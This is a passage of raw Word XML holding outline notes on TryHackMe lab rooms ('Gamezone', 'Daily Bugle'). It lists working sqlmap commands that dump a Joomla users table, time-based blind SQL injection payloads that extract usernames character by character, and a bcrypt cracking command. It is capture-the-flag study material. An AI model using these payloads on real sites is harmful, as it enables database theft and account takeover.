        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>access this via localhost:&lt;port&gt; in browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CBDAF7" w14:textId="27217F8D" w:rsidR="00E57FF8" w:rsidRDefault="00E57FF8" w:rsidP="00E57FF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>confirm port use via nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B270EC7" w14:textId="04A93604" w:rsidR="00E57FF8" w:rsidRDefault="00E57FF8" w:rsidP="00E57FF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nmap -sC -sV -p &lt;port&gt; 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A89F006" w14:textId="192DEF2C" w:rsidR="00E57FF8" w:rsidRDefault="00E57FF8" w:rsidP="00E57FF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>versioning information</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="123D310C" w14:textId="7FCB9249" w:rsidR="00E57FF8" w:rsidRDefault="00E57FF8" w:rsidP="00E57FF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>such as detected during ssh forwarding nmap search ^^^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB7ED9C" w14:textId="2AC343E3" w:rsidR="00E57FF8" w:rsidRDefault="00E57FF8" w:rsidP="00E57FF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>searchsploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201016E3" w14:textId="72C4FDDF" w:rsidR="00E57FF8" w:rsidRDefault="00E57FF8" w:rsidP="00E57FF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4C4AED" w14:textId="45020C4C" w:rsidR="00E57FF8" w:rsidRDefault="00E57FF8" w:rsidP="00E57FF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>set PROXIES http:127.0.0.1:8080 (when using module through burp proxy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9EAC07" w14:textId="68D2EA71" w:rsidR="00A72589" w:rsidRDefault="00A72589" w:rsidP="00E57FF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>follow instructions of exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E78E03E" w14:textId="69A8BF65" w:rsidR="00A72589" w:rsidRDefault="00A72589" w:rsidP="00A72589">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>grab root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C3666D" w14:textId="210DD117" w:rsidR="00A72589" w:rsidRDefault="00A72589" w:rsidP="00A72589">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1B335A" w14:textId="61A2BD4C" w:rsidR="00A72589" w:rsidRDefault="007A6E65" w:rsidP="00A72589">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId246" w:history="1">
        <w:r w:rsidR="00A72589" w:rsidRPr="004567AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.notion.so/GAMEZONE-WRITE-UP-2e762633c6234e3b9e1fbb0bcf743fcb</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="47AAA77B" w14:textId="09FD7880" w:rsidR="00A72589" w:rsidRDefault="007A6E65" w:rsidP="00A72589">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId247" w:history="1">
        <w:r w:rsidR="00A72589" w:rsidRPr="004567AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://5ysk3y.github.io/thm/guides/gamezone/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50D89B05" w14:textId="49008ABA" w:rsidR="00A72589" w:rsidRDefault="007A6E65" w:rsidP="00A72589">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId248" w:history="1">
        <w:r w:rsidR="00A72589" w:rsidRPr="004567AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://medium.com/@aniyazov2500/tryhackme-gamezone-1a5b13fbdf2a</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B0E8547" w14:textId="4B5ABFA1" w:rsidR="00A72589" w:rsidRDefault="00A72589" w:rsidP="00A72589">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17442572" w14:textId="77AD1AD1" w:rsidR="00A72589" w:rsidRDefault="00381918" w:rsidP="00A72589">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Daily Bugle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EABE22" w14:textId="504F7A1A" w:rsidR="00381918" w:rsidRDefault="00381918" w:rsidP="00381918">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140C17A6" w14:textId="6F717A53" w:rsidR="00381918" w:rsidRDefault="00422953" w:rsidP="00381918">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6EBA69" w14:textId="3CF0A37F" w:rsidR="00422953" w:rsidRDefault="00422953" w:rsidP="00422953">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>- -script=vuln &lt;ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BD160D" w14:textId="2DA7791C" w:rsidR="00753B97" w:rsidRDefault="00753B97" w:rsidP="00422953">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>- -script=http-enum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22782428" w14:textId="424399EC" w:rsidR="00422953" w:rsidRDefault="00422953" w:rsidP="00422953">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>gobuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3674B965" w14:textId="2F66CC61" w:rsidR="00753B97" w:rsidRDefault="00753B97" w:rsidP="00753B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BB6335" w14:textId="4F6FA066" w:rsidR="00753B97" w:rsidRDefault="00753B97" w:rsidP="00753B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>readme.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08694BD0" w14:textId="2A9E5302" w:rsidR="00753B97" w:rsidRDefault="00753B97" w:rsidP="00753B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Initial Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E34733" w14:textId="26AEEB98" w:rsidR="00753B97" w:rsidRDefault="00753B97" w:rsidP="00753B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CMS version detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F90ECBB" w14:textId="74C69907" w:rsidR="00753B97" w:rsidRDefault="00753B97" w:rsidP="00753B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CVEs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E991DE" w14:textId="0197CFA9" w:rsidR="00753B97" w:rsidRDefault="00753B97" w:rsidP="00753B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>python exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38062FC1" w14:textId="39CF839E" w:rsidR="00753B97" w:rsidRDefault="00753B97" w:rsidP="00753B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Joomblah</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F91B8A" w14:textId="0CDDE8F6" w:rsidR="00753B97" w:rsidRDefault="007A6E65" w:rsidP="00753B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId249" w:history="1">
        <w:r w:rsidR="00753B97" w:rsidRPr="00FF1D5E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/XiphosResearch/exploits/tree/master/Joomblah</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="383EEB47" w14:textId="69D6D667" w:rsidR="00753B97" w:rsidRDefault="00753B97" w:rsidP="00753B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ExploitDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EC22D4" w14:textId="32DF3D69" w:rsidR="00753B97" w:rsidRDefault="00753B97" w:rsidP="00753B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SQLmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3943BAB7" w14:textId="273679C9" w:rsidR="00753B97" w:rsidRDefault="00753B97" w:rsidP="00753B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00753B97">
        <w:t>sqlmap -u "http://10.10.34.93/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=updatexml" --risk=3 --random-agent --dbs -p list[fullordering]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEAEDDB" w14:textId="22926142" w:rsidR="00753B97" w:rsidRDefault="00753B97" w:rsidP="00753B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00753B97">
        <w:t xml:space="preserve">sqlmap -u "http://10.10.34.93/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=updatexml" --risk=3 --random-agent --dbs -p list[fullordering] --threads 10 -D joomla </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00753B97">
        <w:t>tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CD2677" w14:textId="4C7DB39C" w:rsidR="00753B97" w:rsidRDefault="00753B97" w:rsidP="00753B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00753B97">
        <w:t xml:space="preserve">sqlmap -u "http://10.10.34.93/index.php?option=com_fields&amp;view=fields&amp;layout=modal&amp;list[fullordering]=updatexml" --risk=3 --random-agent --dbs -p list[fullordering] --threads 10 -D joomla -T "#__users" </w:t>
      </w:r>
      <w:r w:rsidR="002259C5">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00753B97">
        <w:t>dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D84342" w14:textId="1E719555" w:rsidR="002259C5" w:rsidRDefault="002259C5" w:rsidP="002259C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SQLi (without sqlmap)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067A964E" w14:textId="1C0DF8D6" w:rsidR="002259C5" w:rsidRDefault="002259C5" w:rsidP="002259C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Joomla Version Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0FE9CE" w14:textId="63941623" w:rsidR="002259C5" w:rsidRDefault="002259C5" w:rsidP="002259C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002259C5">
        <w:t>list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432215A8" w14:textId="730D2EFF" w:rsidR="002259C5" w:rsidRDefault="007A6E65" w:rsidP="002259C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId250" w:history="1">
        <w:r w:rsidR="00330747" w:rsidRPr="00FF1D5E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://sqliteonline.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0204F012" w14:textId="6FD40409" w:rsidR="00330747" w:rsidRDefault="00330747" w:rsidP="00330747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00330747">
        <w:t>SELECT 1 FROM demo ORDER BY 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ABCEAC" w14:textId="21110E09" w:rsidR="00330747" w:rsidRDefault="00330747" w:rsidP="00330747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00330747">
        <w:t>SELECT 1 FROM demo ORDER BY (SELECT SLEEP(5) FROM demo limit 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7511AA47" w14:textId="77777777" w:rsidR="00330747" w:rsidRDefault="00330747" w:rsidP="00330747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SELECT 1 FROM demo ORDER BY (SELECT SLEEP(5) FROM demo limit 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BE4A7F" w14:textId="77777777" w:rsidR="00330747" w:rsidRDefault="00330747" w:rsidP="00330747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SELECT 1 FROM demo ORDER BY (SELECT SLEEP(5) FROM demo where 1&gt;2 limit 1); #FALSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3CC8C6" w14:textId="77777777" w:rsidR="00330747" w:rsidRDefault="00330747" w:rsidP="00330747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SELECT 1 FROM demo ORDER BY (SELECT SLEEP(5) FROM demo where 1&lt;2 LIMIT 1); #TRUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EF1738" w14:textId="77777777" w:rsidR="00330747" w:rsidRDefault="00330747" w:rsidP="00330747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SELECT 1 FROM demo ORDER BY (SELECT SLEEP(5) FROM demo where (SELECT COUNT(1) FROM demo)=6 LIMIT 1); # TRUE </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265432EF" w14:textId="0E9A6C77" w:rsidR="00330747" w:rsidRDefault="00330747" w:rsidP="00330747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SELECT 1 FROM demo ORDER BY (SELECT SLEEP(5) FROM demo where (SELECT COUNT(1) FROM demo)=5 LIMIT 1); # FALSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553FD26B" w14:textId="0AF765F8" w:rsidR="00330747" w:rsidRDefault="00330747" w:rsidP="00330747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00330747">
        <w:t>(SELECT SLEEP(5) FROM #__users where (SELECT COUNT(1) FROM #__users)=1 LIMIT 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500F8F9E" w14:textId="22756D39" w:rsidR="00330747" w:rsidRDefault="00330747" w:rsidP="00330747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00330747">
        <w:t>%28SELECT%20SLEEP%285%29%20FROM%20%23__users%20where%20%28SELECT%20COUNT%281%29%20FROM%20%23__users%29%3D1%20LIMIT%201%29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEBD58A" w14:textId="74B22634" w:rsidR="00330747" w:rsidRDefault="00330747" w:rsidP="00330747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00330747">
        <w:t>(SELECT SLEEP(5) from #_users WHERE ((SELECT LENGTH(username) FROM #__users LIMIT 1 OFFSET 0))=1 limit 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753437F4" w14:textId="77777777" w:rsidR="00330747" w:rsidRDefault="00330747" w:rsidP="00330747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>(SELECT SLEEP(5) from #__users WHERE substring((SELECT username FROM #__users LIMIT 1 OFFSET 0),1,1)=BINARY 0x6a limit 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717093EC" w14:textId="7356AD25" w:rsidR="00330747" w:rsidRDefault="00330747" w:rsidP="00330747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>(SELECT SLEEP(5) from #__users WHERE substring((SELECT username FROM #__users LIMIT 1 OFFSET 0),2,1)=BINARY 0x6a limit 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3D4FAA" w14:textId="07A3EC04" w:rsidR="00330747" w:rsidRDefault="007A6E65" w:rsidP="00330747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId251" w:history="1">
        <w:r w:rsidR="00330747" w:rsidRPr="00FF1D5E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/hack3rman/TryHackMe/blob/master/db-blind.py</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="37729D4A" w14:textId="0050DD12" w:rsidR="00330747" w:rsidRDefault="007A6E65" w:rsidP="00330747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId252" w:history="1">
        <w:r w:rsidR="00330747" w:rsidRPr="00FF1D5E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/hack3rman/TryHackMe/blob/master/Daily%20Bugle.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3539DF21" w14:textId="77777777" w:rsidR="00330747" w:rsidRDefault="00330747" w:rsidP="00330747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="577E86A4" w14:textId="5B512C1A" w:rsidR="00753B97" w:rsidRDefault="00753B97" w:rsidP="00753B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Password Collection and Cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C9EF54" w14:textId="0F18C945" w:rsidR="00753B97" w:rsidRDefault="00753B97" w:rsidP="00753B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>JtR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EE20C7" w14:textId="359F97C9" w:rsidR="00753B97" w:rsidRDefault="00753B97" w:rsidP="00753B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00753B97">
        <w:t>sudo john -format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468EC5FF" w14:textId="39A274C3" w:rsidR="00753B97" w:rsidRDefault="00753B97" w:rsidP="00753B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Administrator Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28662C57" w14:textId="1B1E6EED" w:rsidR="00753B97" w:rsidRDefault="00753B97" w:rsidP="00753B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
